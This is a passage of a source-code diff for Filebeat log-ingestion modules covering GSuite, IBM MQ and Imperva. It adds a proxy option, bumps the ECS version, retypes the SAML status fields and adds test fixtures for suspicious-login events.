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" } diff --git a/x-pack/filebeat/module/gsuite/groups/config/config.yml b/x-pack/filebeat/module/gsuite/groups/config/config.yml index 75482518477..36d84b256b9 100644 --- a/x-pack/filebeat/module/gsuite/groups/config/config.yml +++ b/x-pack/filebeat/module/gsuite/groups/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/groups/manifest.yml b/x-pack/filebeat/module/gsuite/groups/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/groups/manifest.yml +++ b/x-pack/filebeat/module/gsuite/groups/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/login/config/config.yml b/x-pack/filebeat/module/gsuite/login/config/config.yml index ab40715bd4a..f5081efa434 100644 --- a/x-pack/filebeat/module/gsuite/login/config/config.yml +++ b/x-pack/filebeat/module/gsuite/login/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/login/config/pipeline.js b/x-pack/filebeat/module/gsuite/login/config/pipeline.js index 0fb518b351d..2ad5d52f7de 100644 --- a/x-pack/filebeat/module/gsuite/login/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/gsuite/login/manifest.yml b/x-pack/filebeat/module/gsuite/login/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/login/manifest.yml +++ b/x-pack/filebeat/module/gsuite/login/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json index 261bf54dbf6..9bc77dc7d03 100644 --- a/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/login/test/gsuite-login-test.json.log-expected.json @@ -51,6 +51,162 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + "event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, + { + "event.action": "suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, { "event.action": "account_disabled_generic", "event.category": [ @@ -207,6 +363,59 @@ "user.id": "1", "user.name": "foo" }, + { + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "gsuite.login", + "event.id": "1", + "event.module": "gsuite", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "gsuite.actor.type": "USER", + "gsuite.event.type": "account_warning", + "gsuite.kind": "admin#reports#activity", + "gsuite.login.affected_email_address": "foo@elastic.co", + "gsuite.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "gsuite", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" + }, { "event.action": "gov_attack_warning", "event.category": [ diff --git a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml index b7e9efc0926..fc0adfcb55c 100644 --- a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/gsuite/saml/config/config.yml b/x-pack/filebeat/module/gsuite/saml/config/config.yml index 62f1e7d9f4e..2916eff9071 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/config.yml +++ b/x-pack/filebeat/module/gsuite/saml/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js index 2011e6d437b..705db7f2f1e 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js @@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("gsuite.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("gsuite.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/gsuite/saml/manifest.yml b/x-pack/filebeat/module/gsuite/saml/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/saml/manifest.yml +++ b/x-pack/filebeat/module/gsuite/saml/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log index 678193e25d5..ed672b58a56 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log @@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json index 850766be83d..7763ca17881 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json @@ -8,23 +8,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + "google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.failure_type": "failure_app_not_configured_for_user", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.second_level_status_code": 400, - "gsuite.saml.status_code": 400, "input.type": "log", "log.offset": 0, "organization.id": "1", @@ -66,23 +66,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.status_code": 400, "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" diff --git a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml index c6aa5ded144..2816afc8a67 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/gsuite/user_accounts/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml b/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml +++ b/x-pack/filebeat/module/gsuite/user_accounts/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml index ac21107959c..8186eeb6b32 100644 --- a/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml +++ b/x-pack/filebeat/module/ibmmq/errorlog/config/errorlog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/imperva/securesphere/config/input.yml b/x-pack/filebeat/module/imperva/securesphere/config/input.yml index 51f37f33c88..689c576dd23 100644 --- a/x-pack/filebeat/module/imperva/securesphere/config/input.yml +++ b/x-pack/filebeat/module/imperva/securesphere/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json b/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json index 0c47319301b..240ab90bde8 100644 --- a/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json +++ b/x-pack/filebeat/module/imperva/securesphere/test/generated.log-expected.json @@ -23,13 +23,13 @@ "radipis5408.mail.local" ], "related.ip": [ - "10.70.155.35", - "10.81.122.126" + "10.81.122.126", + "10.70.155.35" ], "related.user": [ - "tatno", + "aqui", "magn", - "aqui" + "tatno" ], "rsa.counters.dclass_c1": 5910, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -112,12 +112,12 @@ "ccusan7572.api.home" ], "related.ip": [ - "10.159.182.171", - "10.58.116.231" + "10.58.116.231", + "10.159.182.171" ], "related.user": [ - "uradi", "temUten", + "uradi", "qua" ], 